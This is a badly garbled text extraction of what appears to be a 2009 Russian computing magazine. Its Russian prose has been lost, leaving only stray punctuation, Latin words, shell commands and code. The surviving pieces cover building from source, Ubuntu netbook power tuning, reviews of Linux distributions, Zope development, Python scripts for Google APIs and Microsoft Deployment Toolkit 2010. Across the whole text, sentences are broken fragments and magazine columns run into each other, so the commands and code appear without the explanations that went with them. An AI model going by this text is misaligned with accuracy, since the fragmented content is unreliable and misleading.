russel/scons.git

Mercurial code.google.com
, , :
$ sudo apt-get install mercurial
$ hg clone https://inferno-os.
googlecode.com/hg/ inferno-os


.


(
,
Open Source). ?
. : ,
,
,
. : ,
. :
, ,
:
$ cd _
$ patch --dry-run -p1 < ///.patch

,
:
$ patch -p1 < ///.patch


( .gz .bz2).
:
$ gzip -cd .gz | patch -p0

$ bzip2 -cd .bz2 | patch -p0

,
, ,
, patch -R.


, ,
X 10 /130/ 09

. -,
,
gcc-* . -,
binutils. -,

libc-dev, , , make.

-.
Ubuntu:
$ sudo apt-get install buildessential

README, ,
. ,

,
. INSTALL ,
,
autotools,
.


,
,
,

.

Makefile,

.

(
,
Makefile,
,
..)
GNU autotools,
95%

Makefile. autotools, sh
perl, ,
,
scons cmake.
? ,
,
,
, ,
. , , Makefile (

),

make, ( ,
,
..)
Makefile (
).



autotools, configure,

:
$ ./configure --prefix=/usr/local
--without-debug --without-gtk
--with-qt --enable-mmx

'--prefix' , '--with---' '--without--'


,
'--enable--'

. (
) Makefile, make.
Makefile, configure
, :
scons ( SConstruct ) cmake
(CMakeLists.txt).
scons:
$ sudo apt-get install scons

:
$ scons PREFIX=/usr/local
$ sudo scons

README scons .
cmake autotools ,
./configure
cmake. (cmake
,
):
$ sudo apt-get install cmake
$ cmake .
$ make

scons
README INSTALL.

091

UNIXOID

build-essential, ,

, .
,
,
.
:
Checking for qt4... no

( ,
*-dev)
.

, ,
:
Checking for unistd.h... no

google,
,
.
,
, ,

. :
dev-,
,
.
, .

,
, ,

,
,
.
,
..

:
1. ,
;
2.
(,
).
:

:

092


Subversion

$ export CFLAGS="$CFLAGS -I/usr/


local/include -I/opt/include -I/
usr/mysoft/include"
$ export LDFLAGS="$LDFLAGS -L/usr/
local/lib -L/opt/lib -L/usr/mysoft/
lib"

,

, ,
. configure
,
. ,
.
,
(
qemu). ,
-
README,

CC
:
$ sudo apt-get install gcc-3.4
$ export CC='which gcc-3.4'
$ ./configure --prefix=/usr/local

BSD
FreeBSD
,
. ,
,
,
,
.
,
BROKEN,
.

,
.
,

make

. , BSD- make,
,
GNU Make.
gmake
(gmake
&& gmake install).
:
, FreeBSD
.

. ,
BSD
GNU . FreeBSD ()
POSIX,

,
- Linux-

, . ,
. ,

FreeBSD , Linux-:
1.
. (*.h)
Linux FreeBSD
, /
.
man _
FreeBSD ,
.
,
, ,
#include < .h> .
,

.
2.
( ). , ,
, Linux-
,
X 10 /130/ 09

Scons ,
,
/bin/ls

FreeBSD. : Linux-
.
3. , (
man- Linux). .
, , , .

.
make install ( scons
install),
.

(
make uninstall, ,
).

.
checkinstall (http://checkinstall.izto.org),

. . ,

make install:
# checkinstall -R // RPM-
# checkinstall -D // Deb-
# checkinstall -S // Slackware

,
strip .
:
# find / | xargs file | grep "executable" |
grep ELF | cut -f 1 -d : | xargs strip --stripunneeded
# find / | xargs file | grep "shared object" |
grep ELF | cut -f 1 -d : | xargs strip --stripunneeded


! ,
. Wtf? , -

. - ,
X 10 /130/ 09

. ? : README. ,
, .
: ,
, . , /var
, -
. :
'--help' , .
.
, ,
. : ,
.
, .
*nix- , ,
,
. Linux strace, FreeBSD truss (
strace). ,
:
$ strace

,
close open.
, open
(-1), , . 95% ( )
- .
, .




. ,
'-O1' ( '-O') .
'-O2', ,
, '-O3', ,
,
. ,
,

:
O .
.
O2 .
'-O' ,
.
Os '-O2' , .
fomit-frame-pointer
(
). .z

WARNING

info
BSD-
patch

--dry-run.
tgz tbz!

,


BSD-.

INFO

info

Gentoo, ArchLinux
FreeBSD
,


.


,


,
ldconfig(8). OpenBSD:
ldconfig /usr/local/
lib /usr/X11R6/lib.

093

UNIXOID
ADEPT ADEPTG@GMAIL.COM


Linux
,
2009 .

,
. ,
Linux, .

( ),

.
. ,
( ARM)
,

8
,

3-5 .

.
10-50% .



, Acer
Aspire One AOA110 :
8,9" 1024 x 600
CPU Intel Atom N270 1.6
Intel 945GSE
512
8 SSD
10/100 / Ethernet,

094

802.11b/g
0,3 , 2
3- 2200

Linpus
Linux Lite,
( : ),
Ubuntu 9.10 Netbook
Remix (
).
, /home
ext4. Swap- -
SSD. , Ubuntu
Netbook Remix , .

, .
, , -
,
:
1. -
bash-,
30
Firefox 3.5 (google.
com, xakep.ru, linux.com) .
Wi-Fi.
2.
mplayer
Big Buck Bunny (1280x720, ogg).

80%.
bootchart
.
-
:
: 17
-: 163
: 118

?


PowerTOP, Intel.
PowerTOP :
1. .
C3 C4, .
2. . ,
.
3. .
4. , .
5. , , .
PowerTOP Ubuntu :
X 10 /130/ 09

PowerTOP: !

,
, web USB-:
$ sudo rmmod usb_storage uvcvideo
videodev v4l1_compat

/


ACPI-.

$ sudo apt-get install powertop

root,
( ).
,
8,3 , 80%
C3.


, , .
,
, , Compiz ( ),
LCD ..

, bluetooth (
), cups (
), avahi-daemon, saned atd:
$ cd /etc/rc2.d/
$ sudo rm S25bluetooth S50avahidaemon S50cups S50saned S89atd


X 10 /130/ 09

gnome-power-manager.
100%.
50% .
30%,

70%:
$ gconftool-2 --set /apps/
gnome-power-manager/backlight/
brightness_dim_battery --type
string 70

Splash screen ,
.
IPv6, . /
splash screen IPv6
.
/etc/default/grub,
GRUB_CMDLINE_LINUX_DEFAULT.
quiet splash,
ipv6.disable=1.
,
, :
$ sudo update-grub


,

SSD. ,

( noatime).

( commit) (barrier=0).
data=writeback
( ).
, , .
/home.

. , /etc/fstab
:
$ sudo nano /etc/fstab
UUID=31faf447-f5e3-40bd-997016f703ee130b /
ext4
noatime,commit=100,barrier=0 0
1
UUID=baf24048-4209-4c8a-849cd54de626846f /home
ext4
noa
time,commit=100,barrier=0,data=wri
teback 0
2

Intel Atom,
Intel, Enhanced Intel Speedstep Technology,

, . Linux, ,

. ,

095

UNIXOID

,
, ,
/var/log .
/
var/log .
/etc/init.d logdirs:
$ sudo nano /etc/init.d/logdirs
for dir in apparmor apt bootchart
ConsoleKit cups dist-upgrade fsck
gdm news installer samba unattendedupgrades ;
do
if [ ! -e /var/log/$dir ] ;
then
mkdir /var/log/$dir
fi
done

PowerTOP:
,
sysfs:
$ cat /sys/devices/system/cpu/
cpu0/cpufreq/scaling_available_
governors

2.6.31 : conservative,
ondemand, userspace, powersave performance.
Powersave performance

( /sys/devices/
system/cpu/cpu0/cpufreq/cpuinfo_min_freq /
sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_
max_freq, ). Userspace
. Conservative ondemand
(

). Intel ondemand. ,
, :
$ cat /sys/devices/system/cpu/cpu0/
cpufreq/scaling_governor

Ubuntu ondemand .
ondemand:
$ echo ondemand | sudo tee /sys/
devices/system/cpu/cpu0/cpufreq/
scaling_governor

( ), ondemand
.
ondemand :
1. up_threshold ,
.
Ubuntu 95%, .
2. sampling_rate

096

.
100 . 1
( ):
$ echo 1000000 | sudo tee /sys/
devices/system/cpu/cpu0/cpufreq/
sampling_rate

sysfs ,
. /etc/rc.local
:
$ sudo nano /etc/rc.local
echo ondemand > /sys/devices/system/
cpu/cpu0/cpufreq/scaling_governor
echo ondemand > /sys/devices/system/
cpu/cpu1/cpufreq/scaling_governor
echo 1000000 > /sys/devices/system/
cpu/cpu0/cpufreq/sampling_rate
echo 1000000 > /sys/devices/system/
cpu/cpu1/cpufreq/sampling_rate


/. CFQ
HDD;

. SSD ,
,
, CFQ noop.
,
, elevator=noop.
SSD
;
. /etc/
fstab :
$ sudo nano /etc/fstab
tmpfs /var/log tmpfs
0
tmpfs /tmp
defaults
0
tmpfs /var/tmp tmpfs
0

defaults 0
tmpfs
0
defaults 0


:
$ sudo chmod +x /etc/init.d/logdirs
$ sudo ln -s /etc/init.d/logdirs /
etc/rc2.d/S05logdirs

, SSD /
etc/sysctl.conf :
$ sudo nano /etc/sysctl.conf
#
15 . ( 5 .)
vm.dirty_writeback_centisecs=1500
# laptop-mode
vm.laptop_mode=5

USB autosuspend .
,

(:
www.nabble.com/USB-Problems-with-Ubuntu--workaround-td12123128.html). ,
( > 2.6.22),
. PowerTOP USB autosuspend
usbcore.autosuspend=1.
, sysfs. /etc/
rc.local :
$ sudo nano /etc/rc.local
#
for i in `ls /sys/bus/usb/devices/*/
power/level` ; do echo "auto" > $i ;
done
# ,
(, 0 .)
for i in `ls /sys/bus/usb/devices/*/
power/autosuspend` ; do echo "0" >
$i ; done
# Wake-onX 10 /130/ 09

DVD
dvd


Ubuntu Netbook Remix


Lan
ethtool -s eth0 wol d

, ,
8254 hpet
. ,
, clocksource=hpet.

. Intel Atom N270 - (, Hyper-Threading),
.
/etc/init.d/rc
CONCURRENCY=none CONCURRENCY=shell.



,
Linux ( )
. , ,
Asus Eee PC, Acer Aspire
. 3 ( ):
1. www.kuki.me Ubuntu,
Acer.
( : 2.6.31-rc3).
2. array.org/ubuntu Ubuntu.
Asus Eee,
,
. : 2.6.28.
3. www.aspireonekernel.com Ubuntu.
Acer Aspire One.
: 2.6.29.
kuki.me deb-, .
X 10 /130/ 09

( bootchart 11 ). ,
(8,5 8,3 ).
CONFIG_TIMER_STATS,
PowerTOP ,
. ,
, .
array.org
. bootchart
10 . 7,6 . :
Wi-Fi. , .
aspireonekernel.com ,
.
11 8,3 . ,
CONFIG_TIMER_STATS .

.
( , ),
.

PowerTOP
8,3 7,1 ( 14%).
:
-14 (-17%)
- 179
(+10%)

151 (+28%)

, ,
10-30%.
, .
, , .
,
.

ARM ( ). ,

10 . ,
! z

HTTP://WWW
links
www.lesswatts.
org ,

Linux.

Intel,

.

ext4 :
www.kernel.org/
doc/Documentation/
filesystems/ext4.txt.

INFO

info
, Ubuntu
9.10
GRUB2,
/boot/
grub/grub.cfg .

/etc/grub.d /etc/
default/grub.


mplayer,
~/.mplayer/
config loop=0.

097

UNIXOID
ADEPT / ADEPTG@GMAIL.COM /

Linux
GNU/Linux
.
, , -
/ ,
. .

GEEXBOX 1.2.3

: GEEXBOX 1.2.3
: GEEXBOX.ORG
: 10 2009
: GNU GPL
: X86_32,
X86_64, POWERPC
: INTEL
PENTIUM II 400 , 64 M RAM
: KERNEL
2.6.27.13, GLIBC 2.7, UDEV 124, XORG
1.5.3, MPLAYER 1.0RC2

-
LiveCD-
,

(USB-, CF/
SD). GeeXboX (
HD-), c , CD/DVD-, LAN (NFS, SMB/CIFS),
.
Linux ,
FAT NTFS,
,
, GeeXboX .
,
(, rv9 wmv9),

098

(extra-codecs-nonfree),

.
,
.

.
,
Celeron 300A, Crux (www.crux.nu), GeeXboX.
, GeeXboX
. :

. ,
, GeeXboX

,
, .
, , 10- (
).
GeeXboX .

: 1.2. 2.. 1.2.
MPlayer .
2.

.

Freevo,
.
( 19

BusyBox uClibc),
.
TV-, WiFi, DVB-,
- .
// , non-free (RealMedia, QuickTime,
WindowsMedia).
, ,
LIRC.
GeeXboX , .
HD- (Start GeeXboX for HDTV),
.
(1920x1080, 16:9),
. (Start
GeeXboX) 800600,

. vga
( <Tab>), . X 10 /130/ 09

GeeXboX

ArtistX

.

,

. .
.
GeeXboX ISO Generator,
Linux, Mac OS X Windows 9x/NT/2k/XP.

,
.

, ,
,
, , .. ,

. , -

,
iso,
ISO Generator,
ISO-.
,

.
GeeXboX MoviX (movix.
sf.net) ,
Damn Small Linux. ,
. CD, HDD, USB
. MoviXMaker-2
(savannah.nongnu.org/projects/movixmaker)

MoviX/eMoviX MPlayer.
CD/DVD-
X 10 /130/ 09

.

,
.

MYTHBUNTU 9.04

: MYTHBUNTU 9.04
: WWW.MYTHBUNTU.ORG
: 23 2009
: GNU GPL
: I386,
X86_64
: INTEL
PENTIUM AMD CPU 1.0 , 192 M
RAM, 2 HDD ( 80+ )
: KERNEL
2.6.28, GLIBC 2.9, GCC 4.3.3, UDEV 141,
XORG 1.6.0, XFCE 4.6.0, MYTHTV 0.21.0,
MPLAYER 1.0RC2, ATI 8.600, NVIDIA
180.44, FIREFOX 3.0.8
Ubuntu 9.04
Jaunty Jackalope,
.
; Mythbuntu
.
LiveCD,
. ,
.
Ubuntu, ;
,

.
Ubuntu, - ,

. -

.
XFce. ,
,
.
Applications,

MythTV.
Mythbuntu MythTV
,
,
, ,
, ,
.. ( MythTV z 2007 ).
,
MythTV.
PVR-
Mythbuntu
Control Centre. :
(, ),

, , /
(VNC, SSH, Samba, NFS, MySQL),
, LIRC .
Control Centre , Synaptic.
14 MythTV 24 ; (
NVIDIA ATI) .
w32codecs, ffmpeg libdvdcss2 Medibuntu ,
Proprietary Codecs.
MythTV,
Mythbuntu LiveCD
Frontend.
.
.
, Mythbuntu : MythDora (mythdora.com) ,

099

UNIXOID

Mythbuntu
Fedora MythTV, KnoppMyth (mysettopbox.
tv/knoppmyth.html), Knoppix,
MythTV
Fluxbox.

ARTISTX 0.7

: ARTISTX 0.7
: WWW.ARTISTX.ORG/
SITE2/
: 21 2009
: GNU GPL
: I386
: INTEL
PENTIUM II AMD CPU,
512 M RAM, 20 HDD
: KERNEL
2.6.27, GLIBC 2.8, UDEV 124, XORG
1.5.2, GNOME 2.24.1, KDE 4.2.2, COMPIZ
FUSION, FIREFOX 3.0.10, KOFFICE 1.9.98,
GNOME OFFICE, OPENOFFICE.ORG 3.0.1
ArtistX ( Mediainlinux)
. Linux
,
,
.

Ubuntu Studio

ArtistX. DVD-
3.3 ,
, 2500
! , ArtistX
,
.
:
2D -:
Gimp, Inkscape, Nip2, Krita, Cinepaint, Synfig,
Rawstudio, Skencil, Hugin;
3D-: Blender,
Wings3D, Kpovmodeler, Povray, K3D;
: Cinelerra,
Kino, Openmovieeditor, Kdenlive, Pitivi, Avidemux,
Devede;
: Mplayer, Helix Player,
Videolan, Xine, Kaffeine, Kmplayer, LastFM;
:
PD, Rosegarden, Ardour, TerminatorX, Cecilia/
Csound, Gnusound, Mixxx.

0.7 Ubuntu 8.10 Intrepid
Ibex. LiveDVD
,
Ubuntu.
, ArtistX

Ardour, Audacity,
- Hydrogen, - JACK, JAMin,
LilyPond, Mixxx, MIDI/Audio
MusE, MIDI- Rosegarden, MIDI- TiMidity++, CinePaint
, PiTiVi Kino,
Stopmotion , Blender . , , , , , Synfig
, Gimp, Inkscape Scribus.

100

,
, ,
.

ArtistX, , ,
JAD (JackLab Audio
Distribution), Musix GNU+Linux, Dyne:bolic
.
64 Studio (64studio.com),
Debian
64- ( 32- ).
RealTime .

: 2.0 (LiveCD ~600 )
2.1 ( , ~800 ),
3.x, .
, 64 Studio Platform
Development Kit (PDK) ,

Debian Ubuntu.
Ubuntu Studio
(ubuntustudio.org),
,
. .

Ubuntu, .

LINUX-GAMERS LIVE 0.9.5

: LINUX-GAMERS LIVE 0.9.5


: LIVE.LINUX-GAMERS.NET
: 24 2009
: GPL
: I686
: CPU
PENTIUM II, 512 M RAM,
3D ( GEFORCE2 MX/RADEON HD
2400 )
: KERNEL
2.6.29, GLIBC 2.10.1, GCC 4.4.0, UDEV
141, XORG 1.6.1.901, BLACKBOX 0.70.1-5,
ATI NVIDIA
,
Linux- LinuxTag. ,
CD/DVD, ,
boot n play (
). ,
,
32-
.
2 .
,
; .

(
). :
X 10 /130/ 09

linuX-gamers Live
boot n play
LiveDVD Arch Linux. , LinuxTag 2007,
. 0.9.5
LinuxTag 2009.
4 :
Lite ISO (700 ), Big ISO (4,7 ), Lite USB (1 ), Big USB (5 ).
, ,
live.linux-gamers.net/?s=Games. ,
, Big. Armagetronad, Extremetuxracer, X-Moto, Urban Terror,
Warsow, Tremulous .

NVIDIA ATI ( , GNU GPL),
.
CPU,
Space Invaders . (
) . .
, .
.
gamer ; root (,
, ;
123456, - ). /etc/
X11/xorg.conf startx.
. Blackbox.

.
Firefox, XChat, Xterm, Alsamixer .
, wicd
. .


, . /opt/bin/hddinstall.
, ,
!
linuX-gamers SuperGamer
(supergamer.org). VectorLinux
( PCLinuxOS).
, Dual Layer DVD, 7,8 .
XFce, ,
33 : Quake Wars, Doom
3, Prey, Unreal Tournament, Quake 4, OpenArena, Btanks,
Supertuxkart, Neverball, Scorched3d, Warzone ..
X 10 /130/ 09

eAR OS

EAR OS 1.10B FREE EDITION

: EAR OS 1.10B FREE EDITION


: WWW.EAROS.DK
: 23 2008
: GNU GPL
: I386
: CPU 1 , 256 M RAM,
3 HDD
: KERNEL 2.6.24, GLIBC
2.7, GCC 4.2.3, UDEV 117, XORG 1.4.1GIT, FIREFOX 3.0,
ATI 8.3, WINE 1.0.0
EAR OS
AUDIO REALITY,
.
2 : ,
Ubuntu, Real-Time .
Enterprise Edition ,
, , IEEE
1394 . LiveCD
, .
earmusic .
Firestarter, iptables .
, , , ,
.
, : Language Support .
SimDock ,
:
Firefox ( Mediaplayer Connectivity), Audacity 1.3.4b, - Kaffeine
3.5.9, CD DVD K3b, F-Spot, IM- Pidgin, Gimp
2.4.5, Exaile Control Center.
eAR Media Centre, .
, , TV, -, ..
, Skype ( -
), YouTube Flickr.
.
Synaptic; Ubuntu, Medibuntu WineHQ
( 15000 ). z

INFO

info
PVR .
MythTV

,
z 2007 .

,
LinuxMCE,
z 2009 .

101

CODING
SHPAK.VADIM@GMAIL.COM

WEB

ZOPE


WEB-
ZOPE


WEB-. ,
,
ZOPE.
ZOPE2
1998 Digital
Creations, Python-,
CGI
( ,
-
).
, CGI ,
, ,
CGI.
. ,
,
- -.
Zope.
Digital Creations Zope
Corporation
Open Source ZPL.

. 2000
Python, (,
Zope Corporation 2003 ,

Google). Zope2
.
-,
( ),
-, .

.

- .
Z- ,
, Zope
,
. -

102

Zope
.

ZOPE3
Zope3 2001 , Zope
Corporation . Zope2, , .

: Zope2 ,
.
,
Zope2.
Zope3, Zope,
.

Zope2, .
, ( 2009
3.4.0 2.11.3).
Zope3 ,
.
Five,
Zope3 Zope2. Five
Zope2, 2.8.
Zope2

Zope3.
Zope3.


Zope
-:
Zope-
,

, .

( ASP.
NET). ,
, .
.
, ZOBD (Zope Object
Database).
HTML/XML-.
.
Zope
.


Zope- .

.
. ,
.

.
,
. Zope
ORM,
.


,

, -
.
,
.
X 10 /130/ 09

,
, .

.
, .
XML- ZCML (Zope Configuration
Markup Language).
configure.zcml .
Zope etc\package-includes\
my_project_name-configure.zcml,
<include package=my_project_name/>.

DTML
Document Template Markup Language (DTML)
, .
,
( JavaScript, ).
DTML- : Extended Python format strings
(EPFS) HTML. EPFS
. ; : %(date fmt=DayOfWeek upper)s
. HTML
HTML
. HTML-, DTML
( ). ,
REQUEST.
DTML :
<html>
<body>
<dtml-var REQUEST html_quote>
</body>
</html>

ZPT
DTML- , ,
, HTML.
HTML- DTML,
. DTML ,
, . . , DTML
.
Zope3, DTML
.
ZPT (Zope Page Template),
TAL HTML/XML. XML ,
tal . . :
.
tal:replace = . ,
, tal:content = . , :
<head>
<title tal:content="template/title">
The Title
</title>
</head>
X 10 /130/ 09

ZOPE-
title , The Title
template/title. ,
(, repeat, ,
condition, ).

Zope , Java
C#. ,
Interface. ,
. :
from zope.interface import Interface
class IRecipeInfo(Interface):
"""Give information about a recipe."""
def getName():
"""Return the name of the dish."""
def getIngredients():
"""Return a list of ingredients."""

, , .
, , IRecipeInfo:
class IRecipe(IRecipeInfo):
"""Give and store recipes information."""
def setName(name):
"""Set the name of the dish."""
def setIngredients(ingredients):
"""Set the recipes ingredients."""

, ( ):
from zope.interface import implements
from worldcookery.interfaces import IRecipeInfo
class RecipeInfo(object): implements(IRecipeInfo)
def __init__(self, name=u'', ingredients=[]):
self.name = name
self.ingredients = ingredients
def getName(self):
return self.name
def getIngredients(self):
return self.ingredients

103

CODING

ZOPE MANAGEMENT INTERFACE (ZMI)

HTTP://WWW
links
http://zope.org
.
http://wiki.zope.org/
zope3/Zope3Wiki

,

.
http://zopelada.ru,
http://zope3.ru, http://
zope.net.ru .

INFO

info
Zope3
5000 ,
,

.
2006 Grok
Zope3!

Java C# , , Zope-,
. ,
.
zope.interface
. , alsoProvides(obj, IRecipe)
obj ( , !)
IRecipe.
Recipe, classImplements(Recipe, IRecipe).
verifyObject(IRecipe, obj) zope.interface.verify
, .
verifyClass .


get- set- ,
, .
. :
from zope.interface import Interface
from zope.schema import List, TextLine
class IRecipe(Interface):
name = TextLine(
title=u"Name",
description=u"Name of the dish",
required=True)
ingredients = List(title=u"Ingredients",
description=u"List of ingredients.",
required=True,
value_type=TextLine(title=u"Ingredient"))

, , .

1) ( ).
2) Zope ( ).
3) Zope, ,
, Zope-, (
).
mkzopeinstance.bat,
<Python_dir>/Scripts,
, .

104

.
4) bin/runzope
( runzope.bat Windows).
,
.
,
bin/zopectl start. stop.
Unix- ( Windows
).
5) <Zope_server_dir>/lib/python/<app_name>.
6) Zope
(ZMI),
http://localhost:8080/manage.


Zope3 , ,
<Python_dir>\Lib\site-packages, <Python_dir>\Scripts. bin, etc, lib. log var.
bin ( , runzope.bat).
etc .
, etc/zope.conf
. server
TCP/IP 8080 http- 8021 FTP. zodb
. accesslog eventlog
. principals.zcml securitypolicy.zcml

() . site.zcml
,
, .
etc\package-includes
ZCML. .

.
lib\python
, .

etc\package-includes.
log ,
, .
var ZODB.

ZOPE MANAGEMENT INTERFACE (ZMI)


Zope3


. TTW ( )
ZMI,
.
, ZMI ,
Zope.
, ( ).

.
X 10 /130/ 09

>> coding

ZMI
. , .
,
.

HELLO, WORLD!
, Hello, world!.
1. : /lib/python/helloworld.
2. __init__.py (
).
3. browser.py :
from zope.publisher.browser import BrowserView
class HelloView(BrowserView):
def __call__(self):
return """
<html>
<head>
<title>Hello World</title>
</head>
<body>
Hello, world!
</body>
</html>"""

4. helloworld. etc/packageincludes hellow orld-configure.zcml, :


<configure
xmlns="http://namespaces.zope.org/zope">
X 10 /130/ 09

<include package="helloworld" />


</configure>

5. configure.zcml,
lib/python/
helloworld.
helloworld ,
HelloView:
<configure
xmlns="http://namespaces.zope.org/browser">
<page
for="*"
name="helloworld"
permission="zope.Public"
class=".browser.HelloView"
/>
</configure>

6. http://localhost:8080/
helloworld. Hello, world!.

Zope ,
, ,
. ? ,
. .

Zope3.
. z .
! z

105

CODING
PREDIDENTUA / HTTP://TUTAMC.COM/

GOOGLO


PYTHONA
GOOGLE
. !
,

API .
SEO & BLOGSPOT
Google ,
GData ElementTree ( ). ?
, .
,

Blogspot. (http://blogspot.com) ,
, http://super-puper-hacker.blogspot.com.
. -,
blogspot, blogger_service:
from gdata import service
import gdata, atom

query.feed = '/feeds/default/blogs'
feed = blogger_service.Get(query.ToUri())
blog_id = feed.entry[0].GetSelfLink().href.
split("/")[-1]

blog_id . , - .
, ?
, ,
, ,
: www.blogger.com/post-create.g?blogID=3344789329453358925.
.
:
blog_id = 3344789329453358925

blogger_service =
service.GDataService('login@gmail.com','pass')
blogger_service.source = '][akep'
blogger_service.service = 'blogger'
blogger_service.account_type = 'GOOGLE'
blogger_service.server = 'www.blogger.com'
blogger_service.ProgrammaticLogin()

, . id
:
query = service.Query()

106

gdata.GDataEntry,
title content
blogger_service.Post:
title = "TITLE"
text = "TEXT"
entry = gdata.GDataEntry()
entry.title = atom.Title('xhtml', title)
entry.content = atom.Content(content_type='html',
text=text)
X 10 /130/ 09

GOOGLE
Google Inc. ,
(77,04 %) Google, 41 . 345 . .
Google .
160 . .
Google 100 . , ,
, , , , , ,
, , , ,
, Google --
-, , Star Trek, (
) leet.
Proceratium google
Google Earth,
. Page Rank,
Page (),
Google.

blogger_service.Post(entry, '/feeds/%s/posts/
default' % blog_id)

, ,
.
, Google .

, .
, , - . xgoogle ( ),
GoogleSearch,
, get_results ,
.
:
from xgoogle.search import GoogleSearch
gs = GoogleSearch("presidentua")
results = gs.get_results()
while results:
for res in results:
print res.url
results = gs.get_results()

, , .
Google Translate.
API , JavaScript-,
, - . ,
HTML BeautifulSoup.
, opener
urllib2:
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', '][akep /0.1')]
translated_page = opener.open(
"http://translate.google.com/translate_t?" +
X 10 /130/ 09


urllib.urlencode({'sl': sl, 'tl': tl}),
data=urllib.urlencode({'hl': 'en', 'ie': 'UTF8',
'text': text.encode('utf-8'),
'sl': sl, 'tl': tl})
)

opener, Useragent ( - ).
, , API Google:
sl ?
tl ?
hl , ,
en.
ie . , utf-8.
text .
translated_page HTML-, , BeautifulSoup. :
translated_soup = BeautifulSoup(translated_page)

translated_soup . , ,
div- HTML result_box;
, :
translated_soup('div', id='result_box')[0].string

, BeautifulSoup
www.crummy.com/software/BeautifulSoup. ,
.


, , ,
-. ,

. ! ,
, ,
. ,
,
?
, sms-,
.
- , .
, ,
.
.
,

.

107

GOOGL

CODING


GOOGLE

GOOGLE SPREADSHEET

.
,
.

? ?
? Spreadsheets .
http://spreadsheets.google.com,
.
, URL http://spreadsheets.google.com/
ccc?key=tLqt8Y4YaQyqe8DrRBcxS-g&hl=en
tLqt8Y4YaQyqe8DrRBcxS-g.
, , .
.
, ip, user-agent, cookie
- .
first second. ,
, :

GOOGLE CALENDAR

key = 'tLqt8Y4YaQyqe8DrRBcxS-g'
wksht_id = '1'

, :

HTTP://WWW
links
Beautiful Soup:
http://crummy.
com/software/
BeautifulSoup.

DVD
dvd




-DVD.

calendar_service = gdata.calendar.service.
CalendarService()
calendar_service.email = 'spirt40@gmail.
com'
calendar_service.password = ' '
calendar_service.source = '][akep'
calendar_service.ProgrammaticLogin()

:
text = 'Texxxt'
text += ' %s:%s'%(time.localtime()[3],
time.localtime()[4]+2)
event = gdata.calendar.CalendarEventEntry()
event.content = atom.Content(text=text)
event.quick_add = gdata.calendar.\
QuickAdd(value='true')
new_event = calendar_serviceInsertEvent(
event,
'/calendar/feeds/default/private/full')



,
.
!

108

,
. ,
, ,

data = {
'first': 'first data',
'second': 'second, some text'
}

, , .
:
gd_client.InsertRow(data, key, wksht_id)

?
, Google
. , ,

.
,
.
Google Maps,
, , ,
.
Google
App Engine. , Python
Django ,
BigTable,
!
, . , .
X 10 /130/ 09

SYN\ACK
SYN\ACK
GRINDER GRINDER@SYNACK.RU

Microsoft Deployment Toolkit 2010:


Windows-
, ,
. Microsoft Deployment Toolkit 2010, Windows ,
Win2k/WinXP Vista/Seven.

MDT MDT
Business Desktop Deployment,
. BDD
WinXP, BDD
2007 Vista
Office 2007. BDD
(
WDS SCCM 2007)
MDT 2008.
Windows MDT 2008 Update 1 , , 2009 MDT
2010, () WinXPSP3, Vista SP1, Win2k3R2, Win7
Win2k8/R2 (2k3 x86),
Office 2007 SQL Server 2008.
MDT , , ,
, , . MS Office
MDT 2010 Office Customization Tool
(OCT), MSP ,
Office 2007
.
,
.
MDT 2010 ,
,
,

110

MDT .
.
PowerShell .
, MDT 2010
, BitLocker, ,
.
WAIK 2.0
Windows 7,
Win2k8R2 Win7. WinPE 3.0
Windows User State Migration Toolkit 4.0 (USMT,


), .
WAIK (Win2k8R2,
Seven) DISM
(Deployment Image Servicing and Management),
WIM (Windows
Imaging Format) WinPE,
Windows AIK
Package Manager (Pkgmgr.exe), International
Settings Configuration Tool (intlcfg.exe) Windows
Preinstallation Environment (PEimg.exe).
, MDT 2010 :
Application Compatibility Toolkit (ACT)
-

Windows;
Microsoft Assessment and Planning Toolkit
(MAP)


Windows.


, DFS
(Distributed File System,
z_12_2007). MDT
2010 BCDEdit ( MDT
2008 Update 1 BitLocker Drive Preparation
Tool, BdeHdCfg.exe).
Win7
, ,

BitLocker . MDT 2010
WIM
ISO.
MDT 2010, , :
Light Touch Installation (LTI)

(DVD-, ..), ;
Zero Touch Installation (ZTI)
X 10 /130/ 09

ADMIN

SCCM 2007 (SMS 2003 MDT 2010).


LTI ,
.
,
ISO-, MDT 2010.
WDS
( Windows Deployment Services
z_06_2007). , MDT 2010, LTI-.
ZTI
, SCCM, WDS.

MDT 2010 MDT 2010


:
- Microsoft Management Console (MMC) v3.0 ( Vista);
- Microsoft .NET Framework 2.0 ;
- Windows PowerShell CLI 1.0 2.0 CTP3;
- Windows AIK 2.0 Windows 7 (
Windows Windows 7).

Win2k8R2 , WAIK, ,
. ZTI -, WAIK 1.0, LTI
WAIK 2.0.
, MDT 2010,
x86/x64- WinXPSP3 Win2k8R2,
Home, Standard Enterprise.
MDT BDD. Microsoft , MDT 2010. ,
, .
X 10 /130/ 09

ADMIN

MDT
.
, . WAIK
( z_01_2009),
MSXML 6.0 (
WAIK). , ,
Deployment Workbench .

WORKBENCH Workbench
MMC, . ( WAIK,
):
Information Center ( ) "Getting Started",
, "Components"
, MDT;
Deployment Shares ( ) ,
, , ,
, .

MDT 2008 Update 1 2010 Beta1 (+Task


Sequences, +Deploy),
. ,
, Deployment Shares,
.
Components,
Available for Download Download.
, . MDT , .

111

SYN\ACK

OC
MDT

INFO

info
WAIK (Windows
Automated
Installation Kit)
,


Windows.
, WAIK,
,
z 2009
.

,
SCCM 2007 R2,
z 2009 .

, Install Browse (
C:\Program Files\Microsoft Deployment Toolkit\
Components). Install,
. .

new-PSDrive -Name "DS001" -PSProvider


"MDTProvider" -Root "f:\DeploymentShare$"
-Description "MDT Deployment Share"
-NetworkPath "\\SERVER\DeploymentShare$"
-Verbose | add-MDTPersistentDrive -Verbose


,
, , , , . .
Deployment Shares

New Deployment Share.
,
, .
, ,
,
Deployment Share . , f:\
DeploymentShare$ ( ).
UNC (\\
SERVER\DeploymentShare$) .
,
Ask if an image
should be captured.
,
,
.
.
Allow admin password Ask
user to set the local Administrator password .
,
. .

, Ask user for a produt key.
, , .
, View script, PowerShell -,
. :


NewDS.ps1
.

Add-PSSnapIn Microsoft.BDD.PSSnapIn #

112

Deployment Shares; +,
, (Applications, Operating Systems, Out-of-Box Drivers,
Packages, Task Sequenses, Advanced Configuration) .
, ,
,
.
, ,
, , . ,

.
. Operating Systems
Import Operating System.
,
;
:
Full set of source files
CD/DVD ;
Custom image file WIM-;
Windows Deployment Services Images ,
WDS.

.
Source CD/DVD-
, .
.
, Move the
files to the deployment share instead of copying them,
.
